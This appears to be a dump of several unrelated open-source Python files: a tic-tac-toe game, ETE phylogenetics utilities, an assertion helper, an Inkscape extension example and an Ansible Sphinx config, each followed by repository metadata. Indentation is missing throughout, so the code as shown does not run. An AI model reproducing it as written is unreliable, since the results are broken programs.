print ''
def isFieldFull(field):
occupiedPlaces = 0
for row in field:
for place in row:
if place != ' ':
occupiedPlaces += 1
elif place == ' ':
return False
if occupiedPlaces == 9:
return True
def KI_Turn(field):
fieldStatus = isFieldFull(field)
if fieldStatus == True:
return field
result = field
running = True
"It is the turn of the computer."
while running == True:
row = random.randint(0,2)
column = random.randint(0,2)
if field[row][column] == ' ':
result[row][column] = 'O'
running = False
else:
pass
return result
def USER_Turn(field):
fieldStatus = isFieldFull(field)
if fieldStatus == True:
return field
result = field
running = True
print "User it's your turn"
while running == True:
row = int(raw_input('Which row? '))
column = int(raw_input('Which column? '))
if field[row][column] == ' ':
result[row][column] = 'X'
running = False
else:
print 'This place is occupied!'
return result
def Winner(field):
winner = ''
for row in field:
if row == ['X','X','X']:
winner = 'User'
return winner
elif row == ['O','O','O']:
winner = 'Computer'
return winner
else:
winner = ''
columns = [[],[],[]]
for row in field:
columns[0].append(row[0])
columns[1].append(row[1])
columns[2].append(row[2])
for col in columns:
if col == ['X','X','X']:
winner = 'User'
return winner
elif col == ['O','O','O']:
winner = 'Computer'
return winner
else:
winner = ''
dia1 = [field[0][0],field[1][1],field[2][2]]
dia2 = [field[0][2],field[1][1],field[2][0]]
if dia1 == ['X','X','X'] or dia2 == ['X','X','X']:
winner = 'User'
return winner
elif dia1 == ['O','O','O'] or dia2 == ['O','O','O']:
winner = 'Computer'
return winner
else:
winner = ''
fieldStatus = isFieldFull(field)
if fieldStatus == True:
return "Nobody"
return winner
# Time to play!
userScore = 0
computerScore = 0
answer = ''
while answer != 'q':
print 'User: ' + str(userScore)
print 'Computer: ' + str(computerScore)
print 'Press q to exit or anything else to continue'
answer = raw_input(': ')
if answer == 'q':
break
os.system('clear')
field = createNewField()
win = Winner(field)
turn = 0
while win == '':
if win == 'Nobody':
print 'There is no winner.'
break
turn += 1
print 'Turn: ' + str(turn)
printField(field)
field = USER_Turn(field)
win = Winner(field)
if win == 'User':
break
os.system('clear')
turn += 1
print 'Turn: ' + str(turn)
printField(field)
field = KI_Turn(field)
win = Winner(field)
if win == 'Computer':
break
os.system('clear')
printField(field)
print 'The winner is: ' + win
if win == 'User':
userScore += (10-turn)
elif win == 'Computer':
computerScore += (10-turn)
print "User: " + str(userScore)
print "Computer: " + str(computerScore)
|
dodonator/ticTacToe
|
outdatet/ticTacToe.py
|
Python
|
gpl-3.0
| 3,105
|
from __future__ import absolute_import
from __future__ import print_function
# -*- coding: utf-8 -*-
# #START_LICENSE###########################################################
#
#
# This file is part of the Environment for Tree Exploration program
# (ETE). http://etetoolkit.org
#
# ETE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ETE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ETE. If not, see <http://www.gnu.org/licenses/>.
#
#
# ABOUT THE ETE PACKAGE
# =====================
#
# ETE is distributed under the GPL copyleft license (2008-2015).
#
# If you make use of ETE in published work, please cite:
#
# Jaime Huerta-Cepas, Joaquin Dopazo and Toni Gabaldon.
# ETE: a python Environment for Tree Exploration. Jaime BMC
# Bioinformatics 2010,:24doi:10.1186/1471-2105-11-24
#
# Note that extra references to the specific methods implemented in
# the toolkit may be available in the documentation.
#
# More info at http://etetoolkit.org. Contact: huerta@embl.de
#
#
# #END_LICENSE#############################################################
import sys
from os import kill
from os.path import join as pjoin
from os.path import split as psplit
from os.path import exists as pexist
import os
import socket
import string
from .getch import Getch
import random
import hashlib
import logging
import time
import datetime
import re
import shutil
from glob import glob
import six
from six.moves import range
from six.moves import input
try:
import numpy
except ImportError:
import math
def _mean(nums):
return float(sum(nums)) / len(nums)
def _std(nums):
avg = _mean(nums)
variance = [(x - avg)**2 for x in nums]
std = math.sqrt(_mean(variance))
return std
def _median(nums):
nums.sort()
size = len(nums)
midPos = size // 2
if size % 2 == 0:
median = (nums[midPos] + nums[midPos-1]) / 2.0
else:
median = nums[midPos]
return median
_max = max
_min = min
else:
_std = numpy.std
_max = numpy.max
_min = numpy.min
_mean = numpy.mean
_median = numpy.median
log = logging.getLogger("main")
DEBUG = lambda: log.level <= 10
hascontent = lambda f: pexist(f) and os.path.getsize(f) > 0
GLOBALS = {
"running_jobs": set(), # Keeps a list of jobs consuming cpu
"cached_status": {}, # Saves job and task statuses by id to be
# used them within the same get_status cycle
}
class _DataTypes(object):
def __init__(self):
self.msf = 100
self.alg_fasta = 200
self.alg_phylip = 201
self.alg_nt_fasta = 202
self.alg_nt_phylip = 203
self.clean_alg_fasta = 225
self.clean_alg_phylip = 226
self.kept_alg_columns = 230
self.concat_alg_fasta = 250
self.concat_alg_phylip = 251
self.alg_stats = 260
self.alg_list = 290
self.best_model = 300
self.model_ranking = 305
self.model_partitions = 325
self.tree = 400
self.tree_stats = 410
self.constrain_tree = 425
self.constrain_alg = 426
self.cogs = 500
self.cog_analysis = 550
self.job = 1
self.task = 2
DATATYPES = _DataTypes()
ETE_CITE =u"""Huerta-Cepas J, Dopazo J, Gabaldón T. ETE: a python
Environment for Tree Exploration. BMC Bioinformatics. 2010 Jan
13;11:24."""
PHYML_CITE = u"""Guindon S, Dufayard JF, Lefort V, Anisimova M, Hordijk W, Gascuel O.
New algorithms and methods to estimate maximum-likelihood phylogenies:
assessing the performance of PhyML 3.0. Syst Biol. 2010
May;59(3):307-21."""
FASTTREE_CITE = u"""Price MN, Dehal PS, Arkin AP. FastTree 2 -
approximately maximum-likelihood trees for large alignments. PLoS
One. 2010 Mar 10;5(3):e9490."""
RAXML_CITE = u"""Stamatakis A. RAxML version 8: a tool for phylogenetic analysis and
post-analysis of large phylogenies Bioinformatics (2014) 30 (9): 1312-1313."""
MAFFT_CITE = u"""Katoh K, Kuma K, Toh H, Miyata T. MAFFT version 5:
improvement in accuracy of multiple sequence alignment. Nucleic Acids
Res. 2005 Jan 20;33(2):511-8."""
TRIMAL_CITE = u"""Capella-Gutiérrez S, Silla-Martínez JM, Gabaldón T.
trimAl: a tool for automated alignment trimming in large-scale
phylogenetic analyses. Bioinformatics. 2009 Aug 1;25(15):1972-3."""
MUSCLE_CITE = u"""Edgar RC. MUSCLE: multiple sequence alignment with
high accuracy and high throughput.", Nucleic Acids Res. 2004 Mar
19;32(5):1792-7."""
CLUSTALO_CITE = u""" Sievers F, Wilm A, Dineen D, Gibson TJ, Karplus
K, Li W, Lopez R, McWilliam H, Remmert M, Söding J, Thompson JD,
Higgins DG. Fast, scalable generation of high-quality protein
multiple sequence alignments using Clustal Omega. Mol Syst Biol. 2011
Oct 11;7:539. doi: 10.1038/msb.2011.75."""
DIALIGN_CITE = u"""Subramanian AR, Kaufmann M, Morgenstern B.
DIALIGN-TX: greedy and progressive approaches for segment-based
multiple sequence alignment. Algorithms Mol Biol. 2008 May 27;3:6."""
MCOFFEE_CITE = u"""Wallace IM, O'Sullivan O, Higgins DG, Notredame C.
M-Coffee: combining multiple sequence alignment methods with T-Coffee.
Nucleic Acids Res. 2006 Mar 23;34(6):1692-9. """
JMODELTEST_CITE = u"""Darriba D, Taboada GL, Doallo R, Posada
D. jModelTest 2: more models, new heuristics and parallel computing.Nat
Methods. 2012 Jul 30;9(8):772."""
try:
from collections import OrderedDict
except ImportError:
from ete3.tools.phylobuild_lib.ordereddict import OrderedDict
# ete3 should be added to the python path by the npr script
from ete3.phylo import PhyloTree
from ete3.coretype.tree import Tree
from ete3.coretype.seqgroup import SeqGroup
from ete3.parser.fasta import read_fasta
from ete3.coretype import tree
from ete3.ncbi_taxonomy import ncbiquery as ncbi
# This default values in trees are Very important for outgroup
# selection algorithm to work:
tree.DEFAULT_SUPPORT = 1.0
tree.DEFAULT_DIST = 1.0
#from ete3.treeview import drawer
#drawer.GUI_TIMEOUT = 1
TIME_FORMAT = '%a %b %d %H:%M:%S %Y'
AA = set('ACEDGFIHKMLNQPSRTWVY*-.UOBZJX') | set('acedgfihkmlnqpsrtwvyuobzjx')
NT = set("ACGT*-.URYKMSWBDHVN") | set("acgturykmswbdhvn")
GAP_CHARS = set(".-")
GENCODE = {
'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',
'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',
'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',
'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',
'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',
'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',
'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',
'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',
'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',
'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',
'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',
'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',
'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',
'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',
'TAC':'Y', 'TAT':'Y', 'TAA':'*', 'TAG':'*',
'TGC':'C', 'TGT':'C', 'TGA':'*', 'TGG':'W',
'---': '-',
}
# Aux functions (general)
md5 = lambda x: hashlib.md5(x).hexdigest()
encode_seqname = lambda x: md5(x)[:10]
basename = lambda path: psplit(path)[-1]
# Aux functions (task specific)
get_raxml_mem = lambda taxa,sites: (taxa-2) * sites * (80 * 8) * 9.3132e-10
del_gaps = lambda seq: seq.replace("-","").replace(".", "")
random_string = lambda N: ''.join(random.choice(string.ascii_uppercase +
string.digits) for x in range(N))
generate_id = lambda items: md5(','.join(sorted(items)))
generate_runid = lambda: md5(str(time.time()*random.random()))
HOSTNAME = socket.gethostname()
def tobool(value):
return str(value).lower() in set(["1", "true", "yes"])
def rpath(fullpath):
'Returns relative path of a task file (if possible)'
m = re.search("/(tasks/.+)", fullpath)
if m:
return m.groups()[0]
else:
return fullpath
def ask(string, valid_values, default=-1, case_sensitive=False):
""" Asks for a keyborad answer """
v = None
if not case_sensitive:
valid_values = [value.lower() for value in valid_values]
while v not in valid_values:
v = input("%s [%s]" % (string,','.join(valid_values) ))
if v == '' and default>=0:
v = valid_values[default]
if not case_sensitive:
v = v.lower()
return v
def generate_node_ids(target_seqs, out_seqs):
cladeid = generate_id(target_seqs)
nodeid = md5(','.join([cladeid, generate_id(out_seqs)]))
return nodeid, cladeid
def merge_arg_dicts(source, target, parent=""):
for k,v in six.iteritems(source):
if not k.startswith("_"):
if k not in target:
target[k] = v
else:
log.warning("%s: [%s] argument cannot be manually set",
parent,k)
return target
def load_node_size(n):
if n.is_leaf():
size = 1
else:
size = 0
for ch in n.children:
size += load_node_size(ch)
n.add_feature("_size", size)
return size
def render_tree(tree, fname):
# Generates tree snapshot
npr_nodestyle = NodeStyle()
npr_nodestyle["fgcolor"] = "red"
for n in tree.traverse():
if hasattr(n, "nodeid"):
n.set_style(npr_nodestyle)
ts = TreeStyle()
ts.show_leaf_name = True
ts.show_branch_length = True
ts.show_branch_support = True
ts.mode = "r"
iterface = faces.TextFace("iter")
ts.legend.add_face(iterface, 0)
tree.dist = 0
tree.sort_descendants()
tree.render(fname, tree_style=ts, w=700)
def sec2time(secs):
return str(datetime.timedelta(seconds=secs))
def read_time_file(fname):
INFO_TIME = open(fname)
try:
l1 = INFO_TIME.readline().strip()
l1 = l1.replace("CEST", "") # TEMP FIX
l1 = l1.replace("EDT", "") # TEMP FIX
start = time.mktime(time.strptime(l1, TIME_FORMAT))
except Exception as e:
start = ""
log.warning("execution time: %s", e)
try:
l2 = INFO_TIME.readline().strip()
l2 = l2.replace("CEST", "") # TEMP FIX
l2 = l2.replace("EDT", "") # TEMP FIX
end = time.mktime(time.strptime(l2, TIME_FORMAT))
except Exception as e:
end = ""
log.warning("execution time: %s", e)
INFO_TIME.close()
return start, end
def dict_string(dictionary, ident = '', braces=1):
""" Recursively prints nested dictionaries."""
text = []
for key in sorted(dictionary.keys()):
value = dictionary[key]
if isinstance(value, dict):
text.append('%s%s%s%s' %(ident,braces*'[',key,braces*']'))
text.append('\n')
text.append(dict_string(value, ident+' ', braces+1))
else:
if isinstance(value, set) or isinstance(value, frozenset):
value = sorted(value)
text.append(ident+'%s = %s' %(key, value))
text.append('\n')
return ''.join(text)
def checksum(*fnames):
block_size=2**20
hash = hashlib.md5()
for fname in fnames:
f = open(fname, "rb")
while True:
data = f.read(block_size)
if not data:
break
hash.update(data)
f.close()
return hash.hexdigest()
def pid_up(pid):
""" Check For the existence of a unix pid. """
try:
kill(int(pid), 0)
except OSError:
return False
else:
return True
def clear_tempdir():
base_dir = GLOBALS.get("basedir", None)
out_dir = GLOBALS["output_dir"]
scratch_dir = GLOBALS.get("scratch_dir", GLOBALS.get("dbdir", base_dir))
if base_dir and base_dir != out_dir:
try:
log.log(20, "Copying new db files to output directory %s..." %out_dir)
if not pexist(out_dir):
os.makedirs(out_dir)
if os.system("cp -a %s/* %s/" %(scratch_dir, out_dir)):
log.error("Could not copy data from scratch directory!")
log.log(20, "Deleting temp directory %s..." %scratch_dir)
except Exception as e:
print(e)
log.error("Could not copy data from scratch directory!")
pass
# By all means, try to remove temp data
try: shutil.rmtree(scratch_dir)
except OSError: pass
def terminate_job_launcher():
back_launcher = GLOBALS.get("_background_scheduler", None)
if back_launcher:
#GLOBALS['_job_queue'].close()
GLOBALS['_job_queue'].cancel_join_thread()
back_launcher.join(120) # gives a couple of minutes to finish
back_launcher.terminate()
def print_as_table(rows, header=None, fields=None, print_header=True, stdout=sys.stdout):
""" Print >>Stdout, a list matrix as a formated table. row must be a list of
dicts or lists."""
if header is None:
header = []
def _str(i):
if isinstance(i, float):
return "%0.2f" %i
else:
return str(i)
def _safe_len(i):
return len(re.sub('\\033\[\d+m', '', _str(i)))
def _safe_rjust(s, just):
return (" " * (just - _safe_len(s))) + s
vtype = None
for v in rows:
if vtype != None and type(v)!=vtype:
raise ValueError("Mixed row types in input")
else:
vtype = type(v)
lengths = {}
if vtype == list or vtype == tuple:
v_len = len(fields) if fields else len(rows[0])
if header and len(header)!=v_len:
raise Exception("Bad header length")
# Get max size of each field
if not fields:
fields = list(range(v_len))
for i,iv in enumerate(fields):
header_length = 0
if header != []:
#header_length = len(_str(header[i]))
header_length = _safe_len(header[i])
max_field_length = max( [_safe_len(r[iv]) for r in rows] )
lengths[i] = max( [ header_length, max_field_length ] )
if header and print_header:
# Print >>Stdout, header names
for i in range(len(fields)):
print(_str(header[i]).rjust(lengths[i])+" | ", end=' ', file=stdout)
print("", file=stdout)
# Print >>Stdout, underlines
for i in range(len(fields)):
print("".rjust(lengths[i],"-")+" | ", end=' ', file=stdout)
print("", file=stdout)
# Print >>Stdout, table lines
for r in rows:
for i,iv in enumerate(fields):
#print >>stdout, _str(r[iv]).rjust(lengths[i])+" | ",
print(_safe_rjust(_str(r[iv]), lengths[i])+" | ", end=' ', file=stdout)
print("", file=stdout)
elif vtype == dict:
if header == []:
header = list(rows[0].keys())
for ppt in header:
lengths[ppt] = max( [_safe_len(_str(ppt))]+[ _safe_len(_str(p.get(ppt,""))) for p in rows])
if header:
for ppt in header:
print(_safe_rjust(_str(ppt), lengths[ppt])+" | ", end=' ', file=stdout)
print("", file=stdout)
for ppt in header:
print("".rjust(lengths[ppt],"-")+" | ", end=' ', file=stdout)
print("", file=stdout)
for p in rows:
for ppt in header:
print(_safe_rjust(_str(p.get(ppt,""), lengths[ppt]))+" | ", end=' ', file=stdout)
print("", file=stdout)
page_counter +=1
def get_node2content(node, store=None):
if not store: store = {}
for ch in node.children:
get_node2content(ch, store=store)
if node.children:
val = []
for ch in node.children:
val.extend(store[ch])
store[node] = val
else:
store[node] = [node.name]
return store
def iter_prepostorder(tree, is_leaf_fn=None):
"""
EXPERIMENTAL
"""
to_visit = [tree]
if is_leaf_fn is not None:
_leaf = is_leaf_fn
else:
_leaf = tree.__class__.is_leaf
while to_visit:
node = to_visit.pop(-1)
try:
node = node[1]
except TypeError:
# PREORDER ACTIONS
yield (False, node)
if not _leaf(node):
# ADD CHILDREN
to_visit.extend(reversed(node.children + [[1, node]]))
else:
#POSTORDER ACTIONS
yield (True, node)
def send_mail_smtp(toaddrs, subject, msg):
import smtplib
fromaddr = "no-reply@yournprprocess.local"
# The actual mail send
client = smtplib.SMTP('localhost', 1025)
client.sendmail(fromaddr, toaddrs, msg)
client.quit()
print("Mail sent to", toaddrs)
def send_mail(toaddrs, subject, text):
try:
from email.mime.text import MIMEText
from subprocess import Popen, PIPE
msg = MIMEText(text)
msg["From"] = 'YourNPRprocess@hostname'
msg["To"] = toaddrs
msg["Subject"] = subject
p = Popen(["/usr/sbin/sendmail", "-t"], stdin=PIPE)
p.communicate(msg.as_string())
except Exception as e:
print(e)
def symlink(target, link_name):
try:
os.remove(link_name)
except OSError:
pass
os.symlink(target, link_name)
def silent_remove(target):
try:
os.remove(target)
except OSError:
pass
def get_latest_nprdp(basedir):
avail_dbs = []
for fname in glob(os.path.join(basedir, "*.db")):
m = re.search("npr\.([\d\.]+)\.db", fname)
if m:
avail_dbs.append([float(m.groups()[0]), fname])
if avail_dbs:
avail_dbs.sort()
print(avail_dbs)
if avail_dbs:
last_db = avail_dbs[-1][1]
print("Using latest db file available:", os.path.basename(last_db))
return last_db
else:
#tries compressed data
compressed_path = pjoin(basedir, "nprdata.tar.gz")
if pexist(compressed_path):
import tarfile
tar = tarfile.open(compressed_path)
for member in tar:
print(member.name)
m = re.search("npr\.([\d\.]+)\.db", member.name)
if m:
print(member)
avail_dbs.append([float(m.groups()[0]), member])
return None
def npr_layout(node):
if node.is_leaf():
name = faces.AttrFace("name", fsize=12)
faces.add_face_to_node(name, node, 0, position="branch-right")
if hasattr(node, "sequence"):
seq_face = faces.SeqFace(node.sequence, [])
faces.add_face_to_node(seq_face, node, 0, position="aligned")
if "treemerger_type" in node.features:
ttype=faces.AttrFace("tree_type", fsize=8, fgcolor="DarkBlue")
faces.add_face_to_node(ttype, node, 0, position="branch-top")
#ttype.background.color = "DarkOliveGreen"
node.img_style["size"] = 20
node.img_style["fgcolor"] = "red"
if "alg_type" in node.features:
faces.add_face_to_node(faces.AttrFace("alg_type", fsize=8), node, 0, position="branch-top")
if "treemerger_rf" in node.features:
faces.add_face_to_node(faces.AttrFace("treemerger_rf", fsize=8), node, 0, position="branch-bottom")
support_radius= (1.0 - node.support) * 30
if support_radius > 1:
support_face = faces.CircleFace(support_radius, "red")
faces.add_face_to_node(support_face, node, 0, position="float-behind")
support_face.opacity = 0.25
faces.add_face_to_node(faces.AttrFace("support", fsize=8), node, 0, position="branch-bottom")
if "clean_alg_mean_identn" in node.features:
identity = node.clean_alg_mean_identn
elif "alg_mean_identn" in node.features:
identity = node.alg_mean_identn
if "highlighted" in node.features:
node.img_style["bgcolor"] = "LightCyan"
if "improve" in node.features:
color = "orange" if float(node.improve) < 0 else "green"
if float(node.improve) == 0:
color = "blue"
support_face = faces.CircleFace(200, color)
faces.add_face_to_node(support_face, node, 0, position="float-behind")
try:
from ete3 import TreeStyle, NodeStyle, faces
from ete3.treeview import random_color
NPR_TREE_STYLE = TreeStyle()
NPR_TREE_STYLE.layout_fn = npr_layout
NPR_TREE_STYLE.show_leaf_name = False
except ImportError:
TreeStyle, NodeStyle, faces, random_color = [None]*4
NPR_TREE_STYLE = None
# CONVERT shell colors to the same curses palette
COLORS = {
"wr": '\033[1;37;41m', # white on red
"wo": '\033[1;37;43m', # white on orange
"wm": '\033[1;37;45m', # white on magenta
"wb": '\033[1;37;46m', # white on blue
"bw": '\033[1;37;40m', # black on white
"lblue": '\033[1;34m', # light blue
"lred": '\033[1;31m', # light red
"lgreen": '\033[1;32m', # light green
"yellow": '\033[1;33m', # yellow
"cyan": '\033[36m', # cyan
"blue": '\033[34m', # blue
"green": '\033[32m', # green
"orange": '\033[33m', # orange
"red": '\033[31m', # red
"magenta": "\033[35m", # magenta
"white": "\033[0m", # white
None: "\033[0m", # end
}
def colorify(string, color):
return "%s%s%s" %(COLORS[color], string, COLORS[None])
def clear_color(string):
return re.sub("\\033\[[^m]+m", "", string)
|
fmaguire/ete
|
ete3/tools/phylobuild_lib/utils.py
|
Python
|
gpl-3.0
| 21,864
|
import re
from . import expression
class AssertionBase:
pass
class RowAssertion(AssertionBase):
def __init__(self, config, assert_config):
assert assert_config["type"] == "row"
self.config = config
self.assert_config = assert_config
def check(self, data):
if self.type == "eq":
return self.assertEqual(data)
elif self.type == "in":
return self.assertIn(data)
elif self.type == "match":
return self.assertMatch(data)
raise NotImplementedError
def error_message(self, data):
if self.type == "eq":
source = self.get(self.args_source, data)
return "{} != {}".format(source, repr(self.args_value))
elif self.type == "in":
source = self.get(self.args_source, data)
return "{} not in {}".format(repr(self.args_value), source)
elif self.type == "match":
source = self.get(self.args_source, data)
return "{} does not match {}".format(source, repr(self.args_value))
raise NotImplementedError
def assertEqual(self, data):
source = self.get(self.args_source, data)
value = self.args_value
return source == value
def assertIn(self, data):
value = self.args_value
source = self.get(self.args_source, data)
return value in source
def assertMatch(self, data):
value = self.args_value
source = self.get(self.args_source, data)
return bool(re.match(value, source))
def get(self, item, data):
if isinstance(item, int):
return data[item]
elif isinstance(item, str) and expression.is_slice(item):
s = expression.to_slice(item)
return data[s]
raise NotImplementedError
@property
def type(self):
return self.assert_config["f"]
@property
def args_source(self):
return self.assert_config["args"]["source"]
@property
def args_value(self):
value = self.assert_config["args"]["value"]
if expression.is_config_expr(value):
value = self.config.evaluate(value)
return value
|
mugwort-rc/idata
|
idata/config/assertion.py
|
Python
|
gpl-3.0
| 2,193
|
# Copyright (c) Mathias Kaerlev 2012.
# This file is part of Anaconda.
# Anaconda is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Anaconda is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Anaconda. If not, see <http://www.gnu.org/licenses/>.
from mmfparser.data.chunkloaders.actions.names import *
|
joaormatos/anaconda
|
mmfparser/data/chunkloaders/actions/__init__.py
|
Python
|
gpl-3.0
| 749
|
#!/usr/bin/python
import inkex
import inkscapeMadeEasy_Base as inkBase
import inkscapeMadeEasy_Draw as inkDraw
class myExtension(inkBase.inkscapeMadeEasy):
def __init__(self):
inkex.Effect.__init__(self)
self.OptionParser.add_option("--tab", action="store", type="string", dest="tab", default="object")
self.OptionParser.add_option("--myColorPicker", action="store", type="string", dest="myColorPickerVar", default='0')
self.OptionParser.add_option("--myColorOption", action="store", type="string", dest="myColorOptionVar", default='0')
def effect(self):
color = inkDraw.color.colorPickerToRGBalpha(self.options.myColorPickerVar)
# do the same thing, but first verify whether myColorOptionVar is providing a pre defined color or asking to get it from the picker.
color = inkDraw.color.parseColorPicker(self.options.myColorOptionVar, self.options.myColorPickerVar)
if __name__ == '__main__':
x = myExtension()
x.affect()
|
fsmMLK/inkscapeMadeEasy
|
examples/iME_Draw_colorPicker.py
|
Python
|
gpl-3.0
| 1,000
|
# -*- coding: utf-8 -*-
#
# documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 27 13:23:22 2008-2009.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import os
# pip install sphinx_rtd_theme
# import sphinx_rtd_theme
# html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
# sys.path.append(os.path.abspath('some/directory'))
#
sys.path.insert(0, os.path.join('ansible', 'lib'))
sys.path.append(os.path.abspath(os.path.join('..', '_extensions')))
# We want sphinx to document the ansible modules contained in this repository,
# not those that may happen to be installed in the version
# of Python used to run sphinx. When sphinx loads in order to document,
# the repository version needs to be the one that is loaded:
sys.path.insert(0, os.path.abspath(os.path.join('..', '..', '..', 'lib')))
VERSION = '2.10'
AUTHOR = 'Ansible, Inc'
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings.
# They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# TEST: 'sphinxcontrib.fulltoc'
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'pygments_lexer', 'notfound.extension']
# Later on, add 'sphinx.ext.viewcode' to the list if you want to have
# colorized code generated too for references.
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'Ansible'
copyright = "2021 Red Hat, Inc."
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = VERSION
# The full version, including alpha/beta/rc tags.
release = VERSION
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
# exclude_dirs = []
# A list of glob-style patterns that should be excluded when looking
# for source files.
exclude_patterns = [
'2.10_index.rst',
'ansible_index.rst',
'core_index.rst',
'porting_guides/core_porting_guides',
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
highlight_language = 'YAML+Jinja'
# Substitutions, variables, entities, & shortcuts for text which do not need to link to anything.
# For titles which should be a link, use the intersphinx anchors set at the index, chapter, and section levels, such as qi_start_:
# |br| is useful for formatting fields inside of tables
# |_| is a nonbreaking space; similarly useful inside of tables
rst_epilog = """
.. |br| raw:: html
<br>
.. |_| unicode:: 0xA0
:trim:
"""
# Options for HTML output
# -----------------------
html_theme_path = ['../_themes']
html_theme = 'sphinx_rtd_theme'
html_short_title = 'Ansible Documentation'
html_show_sphinx = False
html_theme_options = {
'canonical_url': "https://docs.ansible.com/ansible/latest/",
'vcs_pageview_mode': 'edit'
}
html_context = {
'display_github': 'True',
'github_user': 'ansible',
'github_repo': 'ansible',
'github_version': 'devel/docs/docsite/rst/',
'github_module_version': 'devel/lib/ansible/modules/',
'github_root_dir': 'devel/lib/ansible',
'github_cli_version': 'devel/lib/ansible/cli/',
'current_version': version,
'latest_version': '2.10',
# list specifically out of order to make latest work
'available_versions': ('latest', '2.9', '2.9_ja', '2.8', 'devel'),
'css_files': ('_static/ansible.css', # overrides to the standard theme
),
}
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
# html_style = 'solar.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'Ansible Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
# html_logo =
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = 'favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['../_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
html_copy_source = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = 'https://docs.ansible.com/ansible/latest'
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Poseidodoc'
# Configuration for sphinx-notfound-pages
# with no 'notfound_template' and no 'notfound_context' set,
# the extension builds 404.rst into a location-agnostic 404 page
#
# default is `en` - using this for the sub-site:
notfound_default_language = "ansible"
# default is `latest`:
# setting explicitly - docsite serves up /ansible/latest/404.html
# so keep this set to `latest` even on the `devel` branch
# then no maintenance is needed when we branch a new stable_x.x
notfound_default_version = "latest"
# makes default setting explicit:
notfound_no_urls_prefix = False
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'ansible.tex', 'Ansible 2.2 Documentation', AUTHOR, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
